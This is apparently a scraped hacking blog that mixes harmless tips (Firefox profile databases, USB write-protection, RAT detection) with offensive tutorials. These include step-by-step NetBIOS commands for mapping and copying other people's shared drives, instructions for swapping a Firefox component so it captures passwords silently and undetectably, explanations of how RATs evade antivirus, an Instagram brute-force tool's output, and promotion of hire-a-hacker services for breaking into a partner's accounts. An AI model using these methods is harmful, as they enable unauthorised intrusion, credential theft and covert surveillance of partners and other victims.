Hack-O-Crack

Posted by admin on January 20, 2020 with 0 Comment

Have you ever wondered where Firefox keeps all of the history it has remembered from your previous browsing sessions… not just URL’s but saved password, form data and certain preference values? The answer, quite simply, is inside of SQLite databases in your Firefox profile folder.
Using an open source program, SQLite Database Browser, you can not only see the structure of the individual databases but browse and, if you are so inclined, manipulate all the data in each of the tables. While this article focuses on Windows, the same basic information should apply to Linux and Mac users as well.

Viewing the Firefox Profile Data

Before getting started, make sure Firefox is closed so there are no problems with locks on any of these files.
Open SQLite Database Browser, click the open icon and navigate to your Firefox Profile. In Windows 7, the location is here:

%UserProfile%\AppData\Roaming\Mozilla\Firefox\Profiles\.default

An interesting database we will take a look at is “formhistory.sqlite”.

The reason this particular database is interesting is because it stores values you enter into form input fields such as your address, email and phone number (if you have Firefox set to keep this information).
As you can see when you open this file and browse the “moz_formhistory” table, there are loads of entries which give you a bit of insight into how this feature works. Essentially the name of the HTML field where you entered the data is stored in the “fieldname” column and the respective value in the “value” column.
Because field names such as “Email” and “Subject” are very common and likely to be across multiple sites, you may see several entries for the same “fieldname” value with different “value” values. This also explains why you can see values you entered on one site when you are filling out a form on a completely different site.

However, this information can be sensitive. For example, if I search for my credit card number (by pattern) I can find the plain text entry in this database.

If you find entries like this you want to get rid of, simply locate the respective “id” value in the Browse Data tab and click the Delete Record button, save your changes and it is gone.
This can be useful for not only clearing sensitive data, but also entries such as old email addresses or phone numbers without having to clear out all of your history.

Other Profile Databases

While there are several more SQLite databases you can take a look at (all having the .sqlite file extension), below are some which may be of interest. You can open these using the SQLite Database Browser exactly as shown above.

addons.sqlite = Installation information on installed add-ons. This is most likely used for keeping your installed add-ons current.
content-prefs.sqlite = Stores information specific to web sites and your settings. For example, the last used location on your computer to upload a file.
downloads.sqlite = Information about items which appear in your download items list.
extensions.sqlite = Information about installed add-ons. There is nothing too insightful here, but if you are looking for intricate details about an add-on, the information here may be helpful.
formhistory.sqlite = (covered in detail above) All non-password data which has been saved in Firefox.
signons.sqlite = Saved login password information. The passwords are encrypted against your master password but you can view the number of times each one has been used.

Take a look and if you find something interesting, please share.

Download SQLite Database Browser

Author Jason Faulkner is a developer and IT professional who never has a hot cup of coffee far away.
Thanks to Stupid Geek Tricks

ADD COMMENTS

Dual booting Winbuilder/Win7PE SE and Backtrack 5 on a USB flash drive with XBOOT

Dual Boot, USB, Video, Winbuilder, Xboot

This is a quick and dirty video to show how to make a multiboot thumbdrive with XBOOT. You can also create a multiboot CD/DVD by combining other ISOs. Operating Systems loaded on mine include: Backtrack 5, Winbuilder/Win7PE SE, DBAN, UBCD4Win, TAILS, Gparted, Ubuntu 11.04, etc.

Download XBOOT from:
http://sites.google.com/site/shamurxboot/

ADD COMMENTS

NetBIOS : Hacking into other Computers

Computers, Hacking, NetBIOS

NetBIOS Hacking-What is it?-

Net BIOS Hacking is the art of hacking into someone else’s computer through your computer. Net BIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-

Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

-What do I need?-

Windows OS
Cain and Abel (http://www.oxid.it/)

-[Step 1, Finding the target.]-
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

It should begin to scan

Then IP’s, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.

-[Part 2, Trial and Error]-

Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.

Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping 192.168.1.103.”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

-[Part 3, Gathering the Information.]-

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a 192.168.1.103.”
This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup

-[Step 4, Breaking In]-

Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view \(IP Address of Target)”
An example for this tutorial would be: “net view \192.168.1.103”

We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.

All’s that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \(IP Address of Target)(Shared Drive). For my example in this tutorial, “net use K: \192.168.1.103C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G…,” for a different

As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!

Congratulations! You’re DONE!

-Commands used in this tutorial:
PING
NBTSTAT -a (IP Address of Target)
NET VIEW \(IP Address of Target)
NET USE K: \(IP Address of Target)(SHARENAME)

ADD COMMENTS

How to Write-Protect USB Flash Drive

Protect, USB

Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.

But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.

This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access.

Just follow these steps:

1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).

2. Navigate to the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\

3. Create a New Key named as StorageDevicePolicies. To do this right-click on Control, and click on New->Key and name it as StorageDevicePolicies.

4. Now right-click on StorageDevicePolicies and create a New->DWORD (32-bit) Value and name it as WriteProtect.

5. Double-click on WriteProtect and set the Value data to 1.

Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.

To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.

Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection.

ADD COMMENTS

Converting Firefox Into Keylogger

Firefox, Hacks, keyloggers, Spy

Without any programming knowledge do you want create your own working undectable keylogger with the help of this pc tricks. Do you know firfox Mozilla save the user name and password in keylogger without user’s consent. Before starting this PC trick we must know that what is keylogger and how it work?
Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.

In this PC tricks we will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.
After applying this pc trick even your antivirus can not detect these file. The files of keylogger are totally undetectable.

This PC trick is working on almost all websites like facebook, hotmail, reddit and digg.But this pc trick somehow failed on Gmail.
Now I will give you the step by step tutorial on how to use this PC trick work:
1. First of all you have to download a script.Click here.

If you are using this pc trick on Windows then goto
C Drive:/Program Files/Mozilla Firefox/Components
If you are using MAC system then goto
Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components

1. Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be replacing this file in next step.

2. Extract the script folder that you have downloaded in first step and copy and paste the nsLoginManagerPrompter.js from the folder to the folder mentioned in step 2.

3. So now your firefox keylogger is ready.Now Each and every username and password will be automatically saved.

Apply this pc trick and make your own directory for the user name and password.

ADD COMMENTS

Spyware Basics

Basics, Spy, Spyware, Tutorials, Tutors

What is spyware?

A spyware is a piece of malicious code or program installed in system to monitor activities of a person. A spyware is capable of logging key strokes, it can take screen shots and if there is active Internet connection then it can even mail logs to specified email-address or transfer logs to ftp server. Beyond just monitoring it can record your computing habits including which site you browse more, at what time you prefer to be on system or amount of time you spend on computer.

A spyware can be used to track all information about your social-networking habits and IRC(Internet Relay Chat) Clients including all major and minor chat clients example: Google Talk, Rediff Messenger, Yahoo Messenger, Microsoft Live Chat, absolutely every thing related to IRC client is exposed to spyware. On the basis of its commercial use and monitoring capabilities spywares are classified as follows,

On Basis Of Commercial Use: Domestic Spywares and Commercial Spywares

On Basis Of Monitoring: Key Loggers, E-mail Loggers/Chat Recorders, Screen Recorders.

Domestic Spywares: This kind of spywares are purchased and used by common people to monitor their system. Most of the times parents install this type of spyware to monitor their children or network admin or a company to monitor computing activities of their employees. The most widely and most powerful use of these spywares are done for hacking purposes only.

Example: SniperSpy, Winspy, Sentry PC, Spy Agent

Commercial Spywares: Commercial Spywares incude the services included in your Operating System and softwares to monitor event logs and crash reports. The information about software crash is anonymously sent to software vendors, also the reports about user experience, crash, memory dump etc are sent to Operating System Vendor. The only fact is that this type of spying is legal to improve product and provide better and secure service.

Example:Windows and Linux Crash Logs, Virus info in Anti-Virus program, Event Collectors etc.

Key Loggers: Key loggers are spywares specially made to record keystrokes from keyboard. Key Logging can retrieve information about bank account password, online transactions, login passwords etc.

E-mail Loggers/Chat Recorders:These spywares are used to track e-mails and chat report from your IRC. If you use e-mail client like Windows Mail or Mozilla Thunderbird etc. Then these spywares are capable of modifying internal settings to forward mails to attacker’s inbox without keeping a track in your Outbox.

Screen Recorders: Screen recorders are capable of capturing screen and send recording using minimum bandwidth. Such monitoring is done by parents on their children to protect them from online pornography.

Example:Spy Agent, Winspy, Sniper Spy

ADD COMMENTS

Bots And Botnets: The Basics

Basics, Bot, Botnet, Tutorials

The word bot is derived from word Robot. Bots are software applications that run automated tasks over internet. Internet bots allow the host to perform click fraud, which occurs on advertising codes on websites to fraud advertisers for money. Rather than just a code a bot might be a compromised system. A compromised system in terms of hacking is known as Zombie system, in other words a zombie is nothing but a bot.

The term botnet is derived from word robot network, which is also called as Zombie Army. A botnet is huge army of zombie systems. So if I infect any system with dark comet rat then will that system will act like bot or zombie to me. And the answer is yes and if you have several PC’s infected with your RAT server that means you will have your botnet.

A botnet usually is meant for illegal activity. They can act as hidden programs that offers identification of vulnerability. Botnets can be used to perform any illegitimate activity like click fraud, password hacking, monitoring, spying, stealing information like credit card numbers, identification theft and even Distributed Denial Of Service attacks. A botnet as huge as 3000 computers is capable of performing undoubtedly untraceable hack without attacker making any extra efforts to hide traces. Bot nets are not always bad they provide search engines their capability to index a site and provide search results.

ADD COMMENTS

RAT (Remote Administration Tool) – IV

RAT, Tutorials

Prevention Against A RAT Attack

Now we are to the last part of RAT Remote Access Tool. Up till now we have covered how a RAT is created, how attackers manage to hide presence of RAT in victim’s PC and how we can manually detect and take action against presence of RAT if our Anti-Virus Program or Security suite fails to detect it. Now in this part we’ll learn how we can prevent ourselves from getting caught by a RAT attack.

As told in RAT- II attacker does some process to hide detection of RAT from Anti-Virus program but you are not fool to click on any suspected file unnecessarily. So most of the time an attacker uses Trojan vector to execute his RAT server on victim. There can be many method an attacker can use to hide his malicious code in some kinda media that can transfer it to victim, such media is known as vector. A vector is responsible for spreading of viruses worms and RATs.

A vector may be a simple image file, executable file, media file or even a website. So now lets have our look on each one by one.

Vector Image File: As stated earlier a RAT file might be very very small in size of 100kbs-200kbs only. But as we are now prone to high definition image files only whose resolution usually remains above 1800×1600 with possible better color depth making it 1MB – 3MB in size. They can store 100-200kbs information in them very easily. If an attacker want to execute RAT from vector image it appends RAT to end of Image file thus when you click on image, image opens without any problem but also invokes appended executable ultimately infecting victim’s computer. The appending is usually done via a software providing binary addition of files without change in their integrity. Now what is binary addition method to add files and how it works is beyond scope of this post. Now this kinda images are distributed by attackers using torrents and by spamming. Have you ever found an e-mail in your inbox with “Nude Pics Of Aishwarya Rai For Free(HD)”, “Katrina Kaif Nude Pics Revealed(HD)”. Now fact number one any how you always know that pics does not really exists and fact number two even if it exist then they are fake pics created using Photo editing tools like Adobe Photoshop or Gimp. Then why to make yourself eager unnecessarily. Keep yourself away from such things, these are tricks by attackers to download those high quality fake images in which they have hidden their dirty stuff.

Executable File: Many RAT clients by default offer you adding a legitimate executable file with their server code so that once the victim runs legitimate file he/she gets infected. These files are usually spread using torrents and Dark Warez sites. Dark Warez sites are those where a software is provided with its key-gen or crack executable, they are also known as pirate sites. Attackers usually bind their files in keygens and crack executable s, I think I don’t need to mention this, because if you have ever downloaded any file from such kinda site your anti-Virus might have got in form. Most people disable Anti-Virus thinking its false alarm but Anti-Virus makers are not fools to give you a false alarm on every such file downloaded from Dark Warez site. They are actually malicious and hence we find most of our college computers are always infected with malware.

Media: Media files like audio and video both can contain malcious code and wrapping against them a RAT file can never get detected since we hardly find any reduction and compromise in quality of media. People who always stay online for movies and music usually become prey to such infected media files. A better defense is always keep your media players and flash player to newest version.

Websites: Now a days many web technologies allow a web page to execute Active X contents on the visitor’s PC via browser. Browsers are per-configured to run scripts and scripting languages responsible

for execution of these Active X elements. Sites which support Java drive by and flash scripts are more likely to put you in trouble. That’s the reason why most of the time I advise to avoid flash contents on your blog because they can be exploited very easily. To avoid getting infected from websites which run malicious codes on your PC always keep your eyes on notification and keep pop-up blocker on and use some good Internet security suite.

ADD COMMENTS

RAT (Remote Administration Tool) – III

RAT, Tutorials

Counter And Defense Against RAT Attack

Welcome to the third part of The RAT tutorial and I am extremely sorry you have to wait a little more so see this article coming up. By the way in this section we ll make ourselves aware how we can counter and create a defense against RAT attack. Dear visitor if you are reading this post without reading its previous parts then I urge you to please read,

The RAT Remote Administration Tool

The RAT Remote Administration Tool-2

before you read this.

So as seen before RAT may use any unknown port to communicate with attacker and the best defense against any process communicating using unknown port is firewall. There are various commercial firewalls available but here are few good free firewalls that can even lead a commercial firewall bow down to its feet. Following are few good free firewall programs on basis of their ranking by customers,

1.Online Armour

2.Zone Alarm

3.Comodo Firewall

4.Private Firewall

People consider Online Armour as one of the toughest free firewall available, by the way I prefer Comodo Firewall. Comodo firewall also shows you process which are communicating, port numbers via which they are communicating and full path of process invoking executable file, here’s a view of how Comodo shows you process.

Now as we discussed in RAT – II a RAT becomes fully undetectable if he/she applies any process discussed in previous RAT post. That means if your anti-virus fails to detect it, following can be symptoms that can appear on your system which can help you identify its presence,

1.Disable Of Task Manager and Disable Of Folder Option

2.Sudden Opening And Closing Of CD/DVD-ROM

3.Blue Screen Of Death or Just Blue Screen

4.High Bandwidth Consumption

5.Sudden Open Of Web Pages

6.Pop Ups

7.Change Of Wallpaper

8.Disappear Of Mouse Arrow, Start Button and Task Manager

If you find any of the above things happening on your PC its time to manually check your system for RAT. But as I told you before RAT server may hide in known processes or may even use only known ports to communicate with attacker so detection would not be easy. Here we’ll learn step by step approach how you can manually detect its presence.

As told earlier a RAT can hide it self in process space of another process like explorer.exe, iexplorer.exe, scvhost.exe, services.exe. Open your firewall and check out if explorer.exe or services.exe are communicating with remote host. If yes then you are infected because these processes never communicate with any remote host. Now the process that communicate are svchost.exe and iexplorer.exe.

To find out whether iexplorer.exe is communicating with remote host as client to installed RAT server close Internet Explorer, wait for 5-6 seconds and see if its communicating then you are infected. Now if attacker has configured to close connection as soon as Internet Explorer(IE) closes you will not be able to detect its presence in firewall, in this case you have to keep yourself prepared by watching how much memory IE takes while opening www.google.com leave IE like that and open “Task Manager” by typing taskmgr.exe in RUN window. Keep your eye on memory consumption(not CPU consumption) of IE if it fluctuates even after 1 minute then you can be sure you are 100% infected.

What if attacker decides to hide process in scvhost.exe? In this case open firewall and watch for ports with which svchost.exe is communicating. Make sure port numbers should be 53 or 443 on remote host in listening mode only, if not then you are infected. Now if attacker has planted port number 53 or 443 in RAT for communication with svchost.exe then how you gonna detect. Now here you’ll need a little technical brain, a scvhost.exe process runs in three modes,

System Mode: Which never communicates with internet

Local Mode: Which never communicates with internet

Network Mode: Which communicates with internet.

All three modes run as different processes with different process IDs. Now the Network Mode scvhost.exe runs as network service, so open taskmgr.exe and locate scvhost.exe where username is Network Service now note process ID, disconnect from network and wait for 1-5 minute monitoring that process memory consumption. You have to wait for 5 minutes just because even after disconnecting scvhost.exe does not settle down network and hence memory usage appears fluctuating for long time. Once memory usage becomes stable then wait for sometime and monitor it for memory usage fluctuation, it should not be above 2 MBs.

Now above were manual method to identify presence of RAT in your system if your Anti-Virus and even malware detection software fails to detect RAT. So far as my view is concerned Norton, Avast Professional, Avira and AVG professional are best Security Suites available to tackle all kind of software based threats and malware. And if you use your system for critical purposes then you are the fellow who is in very much need of “Black Ice Defender”. It is awesome piece of code written specially to avoid any kind of intrusion on your system.

ADD COMMENTS

The RAT (Remote Administration Tool) – II

RAT, Tutorials

Why RAT’s Don’t Get Detected

So we are back to the second part of The RAT Remote Administration Tool. In this section we will learn how an attacker manages to hide a RAT in victim’s computer, if you are new visitor or you haven’t read the first part I urge you to please go through previous post on The RAT before you read this.

Before we proceed I want to tell you there’s no RAT tool available whose server can not get detected by an Anti-Virus program. At practical level every Anti-Virus program can detect RAT developed by all possible free as well as commercially available RAT developing tools. Then how an attacker manages to implement an attack on you. Following may be the reasons, why you may become victim to his/his attack,

Your Anti-Virus Sucks
The attacker has created his/her own RAT client
He had got a custom RAT client from RAT client vendor
Applied Hex-editing on his RAT server EXE
Attacker has used crypt or

As I always tell you hacking evolves by fractions of minutes to fractions of seconds, RAT clients also gets updated and hence your Anti-Virus too needs to be updated. If you don’t update it means you are inviting more and more troubles than just RAT, always update your Anti-Virus programs or let its auto-update option enabled. In any other case than this if your Anti-Virus fails to detect RAT it means it is total crap UN-install it and use some another Anti-Virus program.

The second case is the attacker is master programmer and he/she has used his/her master programmer skill to develop a new custom RAT client. Since the code is new, no Anti-Virus will have its definition ultimately making it Fully UN-Detectable (FUD). It is really very hard to keep yourself safe from such kinda RAT since it is hard to detect before damage is done.

Some vendors also offer custom RAT clients for special price, again due to its code being new any Anti-Virus program will hardly have its definition and hence even this works. Next is hex-editing, it is one of the most difficult thing to do for changing signature of the RAT server(our virus) file. So far as I know it is really very difficult and attacker must be having powerful hand over understanding different number systems and machine level codes, also it is very time consuming process. If you want to know how it is done then Rahul Tyagi has offered a pro tutorial on his blog www.salienthacker.in on hex-editing.

Last is one of the most easiest methods and due to which a VIRUS code becomes Fully Undetectable. The use of crypt-or software avoids the job of recoding and hex-editing and mutates the signature of virus file in such a way that it works fine but its code generates different signature which is not anyhow matches the previous signature, thus making is undetectable.

Other factor that leads to hide RAT in your system is process space sharing. In this the RAT server file shares process space of system processes or well known process like,

explorer.exe

svchost.exe

services.exe

And the last factor that let them do their job is port number. Many RAT clients will use regularly used port numbers to establish connections like HTTP port 80, HTTP proxy port 8080, FTP port 21 and uses any kinda connection may it be TCP or UDP.

So above are some reasons why a RAT server doesn’t get detected when all codes are available to Anti-Virus vendors. So the next time we meet we’ll discus how you can prevent yourself from a RAT attack.

Catching a cheating spouse

Posted by admin on January 20, 2020 with 0 Comment

http://tomphillips.blogspot.com/

Cheating Spouse? Easy ways to catch him/her.

Cheating Spouse

To catch a cheating spouse you need to put on your best Hollywood performance.

As one spouse put it, “It was extremely important that I pretend that absolutely nothing was wrong. I didn’t ask questions I normally wouldn’t. Didn’t let my tone or body gestures give off any clue that I suspected something.”

Many do-it-yourself investigators unknowingly sabotage their own infidelity investigations by suddenly becoming interrogators of their spouses. Once a cheating spouse senses you are on to them then if they have any intelligence at all they take extra precautions to make sure they aren’t caught. This will only slow down your investigation.

Here’s what you can do instead of drilling your cheating spouse with lots of questions, just start keeping a log book of everything he/she does. Write down the suspicious incidents including date, time, place and who the spouse was supposed to be with. Keeping a journal helps you analyze the information easier and uncover patterns you would miss otherwise.

An added benefit of keeping a journal is that liars have bad memories but a journal doesn’t. So if your spouse says he went out bowling last night with two guys from the office, casually ask him about it again in two weeks and see if he supplies the same information. Chances are if he wasn’t really bowling he may tell you that was the night he was at the baseball game.

If you don’t have the patience to keep an on-going journal, then check out the 11 different traps profiled in the Cheating Spouse Traps Guide available at http://CheatingSpouseTraps.com and discover right now how you can easily get concrete evidence of what your spouse is doing behind your back.

Scam alert

Posted by kelvin.mitnick on May 2, 2018 with 25 Comments

We keep getting reports from this page- https://prohackers.agency/

Please be weary of them. Do not waste your resources before you get real help. Please find proofs.

https://hackinghire.com

We will keep updating this page we go on.

Hire Top Professional Hackers

Posted by free on April 28, 2017 with 10 Comments

Many a times, people contact me asking a lot of questions about getting into respective social accounts, ranging from facebook account, to instagram, to VK and so on. We all know relationship issues can be very important when choosing a family, we really need to trust one another, not only by words, but by our everyday activities. Some people need real proves – such as getting their partner’s personal emails, social media accounts and corporate mails filtered.

The good news here is that their a web platform that clearly solves that problem which is hackers-list. Hackers-list is a platform where you meet top professional hackers that have proved themselves in the past, their certificates have been screened, and verified. On hackers-list, you meet different hackers with different price ranges, according to their abilities and swiftness of service. Incredibly, you can get a professional hacker for hire for a price as low as $99/hour.

Hackers-list is not for social media accounts or emails only, they are also into database penetration testings, espionage, mobile phone access, SQL injections and other script-side infiltrations.

On hackers-list, your money is in safe hands because the hackers-list’s admin monitors all sorts of payments, while the big projects are done by escrow.

HACK AN INSTAGRAM ACCOUNT

Posted by kelvin.mitnick on November 4, 2016 with 66 Comments

Instagram contained two distinct vulnerabilities that allowed an attacker to brute-force passwords of user accounts. Combined with user enumeration, a weak password policy, no 2FA nor other mitigating security controls, this could have allowed an attacker to compromise many accounts without any user interaction, including high-profile ones. Facebook fixed both issues and awarded a combined bounty of $5.000.

INTRODUCTION

Authentication brute-force vulnerabilities are very serious issues for any web application. Users are known to pick weak passwords and reuse them and many dictionaries with millions of human-chosen passwords are publicly available to attackers to easily mount successful attacks. However, there are some additional arguments that make brute-force particularly effective against Instagram:

User Enumeration: Instagram usernames are public & enumerable via incremental userIDs.
Weak Password Policy: At the time of submission, the Instagram password policy only enforced a minimum length of 6 characters, allowing choices such as “123456” and “password”.
Two-Factor Authentication: 2FA has only been introduced in February 2016, and is still not rolled out globally.
Account Lockout Policy: No account lockout policy is currently in place, nor any other mitigating security controls.

Therefore, exploitation of these issues could have resulted in the compromise of millions of the 400+ million active Instagram accounts – especially those with predictable passwords. Of course, targeted attacks against high-profile (Celebrity) accounts could have been very effective as well (cf. Apple’s Celebgate).

ISSUE #1: IMPLEMENTATION BUG IN MOBILE AUTHENTICATION BRUTE-FORCE PROTECTION

Out of Scope: In order to identify the Mobile Authentication endpoint communication in an intercepting proxy, SSL Pinning had to be bypassed in the Instagram for Android application. Additionally, in order to modify & attack this endpoint communication, a key had to be phished from the Android application, which is used to generate a HMACSHA256 signature over the POST parameters of every outgoing request. A Burp Plugin was written that transparently hotpatches the signature for outgoing requests generated, such as those generated by the Burp Intruder module – see below. More details can be found in this previous blogpost.

The Instagram for Android application used the endpoint at https://i.instagram.com/api/v1/accounts/login/ to perform authentication. A simple brute-force attack against this mobile authentication endpoint with Burp Intruder revealed that approximately 1000 reliable guesses could be made from one unique IP address, after which the response changed to “username not found”, although the user obviously still existed (Rate limiting):

However, only the next consecutive 1000 guesses resulted in the “username not found” response error message. From the 2000th consecutive guess onward, a reliable response (password correct/incorrect) was followed by an unreliable one (user not found):

This allowed a reliable brute-force attack, since an attacker could reason on the reliable response messages and simply replay the unreliable ones until a reliable answer was received. The only limitation of this attack was that on average, 2 authentication requests had to be made for one reliable password guess attempt. A quick & dirty python script with basic threading support “InstaBrutal.py” was made to prove this. The output of a brute-force attack of10000 popular passwords against my Instagram test account “bruteforceme” with password “perfectcrime” can be seen here:

# tail -f 10k_most_common.txt

hoes

howie

hevnm4

hugohugo

epson

evangeli

eeeee1

eyphed

perfectcrime

# python instabrutal.py

[INFO] Usage: python instabrutal.py <INSTAGRAM_USERNAME> <DICTIONARY_FILENAME> <THREADS> [DEBUG]

# python instabrutal.py bruteforceme 10k_most_common.txt 50

[INFO] Creating 50 worker threads...

[INFO] Total # passwords: 10001

[INFO] Total # threads: 50

147.20 pw/s [=] 7% (736/10001) (Good:686 Bad:0 Error:0)

105.00 pw/s [==] 10% (1050/10001) (Good:1000 Bad:272 Error:0)

70.00 pw/s [==] 10% (1050/10001) (Good:1000 Bad:706 Error:0)

55.00 pw/s [==] 10% (1100/10001) (Good:1050 Bad:1028 Error:0)

50.84 pw/s [==] 12% (1271/10001) (Good:1221 Bad:1218 Error:0)

50.60 pw/s [===] 15% (1518/10001) (Good:1468 Bad:1453 Error:0)

49.94 pw/s [===] 17% (1748/10001) (Good:1698 Bad:1696 Error:0)

49.50 pw/s [===] 19% (1980/10001) (Good:1930 Bad:1913 Error:0)

48.56 pw/s [====] 21% (2185/10001) (Good:2135 Bad:2132 Error:0)

48.18 pw/s [====] 24% (2409/10001) (Good:2359 Bad:2353 Error:0)

48.20 pw/s [=====] 26% (2651/10001) (Good:2601 Bad:2593 Error:0)

48.02 pw/s [=====] 28% (2881/10001) (Good:2831 Bad:2825 Error:0)

46.57 pw/s [======] 30% (3027/10001) (Good:2977 Bad:2973 Error:0)

46.96 pw/s [======] 32% (3287/10001) (Good:3237 Bad:3234 Error:0)

46.72 pw/s [=======] 35% (3504/10001) (Good:3466 Bad:3427 Error:0)

46.38 pw/s [=======] 37% (3710/10001) (Good:3660 Bad:3658 Error:0)

46.61 pw/s [=======] 39% (3962/10001) (Good:3912 Bad:3910 Error:0)

46.58 pw/s [========] 41% (4192/10001) (Good:4142 Bad:4130 Error:0)

45.88 pw/s [========] 43% (4359/10001) (Good:4309 Bad:4303 Error:0)

46.25 pw/s [=========] 46% (4625/10001) (Good:4575 Bad:4573 Error:0)

46.47 pw/s [=========] 48% (4879/10001) (Good:4829 Bad:4823 Error:0)

45.84 pw/s [==========] 50% (5042/10001) (Good:4992 Bad:4990 Error:0)

45.95 pw/s [==========] 52% (5284/10001) (Good:5234 Bad:5229 Error:0)

45.93 pw/s [===========] 55% (5512/10001) (Good:5462 Bad:5455 Error:0)

45.97 pw/s [===========] 57% (5746/10001) (Good:5696 Bad:5693 Error:0)

45.55 pw/s [===========] 59% (5921/10001) (Good:5871 Bad:5870 Error:0)

45.70 pw/s [============] 61% (6169/10001) (Good:6119 Bad:6115 Error:0)

45.84 pw/s [============] 64% (6418/10001) (Good:6368 Bad:6355 Error:0)

45.86 pw/s [=============] 66% (6649/10001) (Good:6599 Bad:6594 Error:0)

45.81 pw/s [=============] 68% (6872/10001) (Good:6822 Bad:6812 Error:0)

45.32 pw/s [==============] 70% (7025/10001) (Good:6975 Bad:6973 Error:0)

45.63 pw/s [==============] 73% (7301/10001) (Good:7251 Bad:7247 Error:0)

45.63 pw/s [===============] 75% (7529/10001) (Good:7479 Bad:7463 Error:0)

45.56 pw/s [===============] 77% (7746/10001) (Good:7696 Bad:7680 Error:0)

45.17 pw/s [===============] 79% (7905/10001) (Good:7855 Bad:7839 Error:0)

45.54 pw/s [================] 81% (8197/10001) (Good:8147 Bad:8134 Error:0)

45.36 pw/s [================] 83% (8392/10001) (Good:8342 Bad:8342 Error:0)

45.26 pw/s [=================] 85% (8599/10001) (Good:8549 Bad:8547 Error:0)

45.43 pw/s [=================] 88% (8858/10001) (Good:8807 Bad:8801 Error:0)

45.49 pw/s [==================] 90% (9098/10001) (Good:9047 Bad:9037 Error:0)

45.31 pw/s [==================] 92% (9289/10001) (Good:9238 Bad:9224 Error:0)

45.24 pw/s [===================] 95% (9501/10001) (Good:9450 Bad:9441 Error:0)

45.41 pw/s [===================] 97% (9763/10001) (Good:9712 Bad:9711 Error:0)

45.37 pw/s [===================] 99% (9982/10001) (Good:9931 Bad:9924 Error:0)

[SUCCESS] Found the right password: perfectcrime

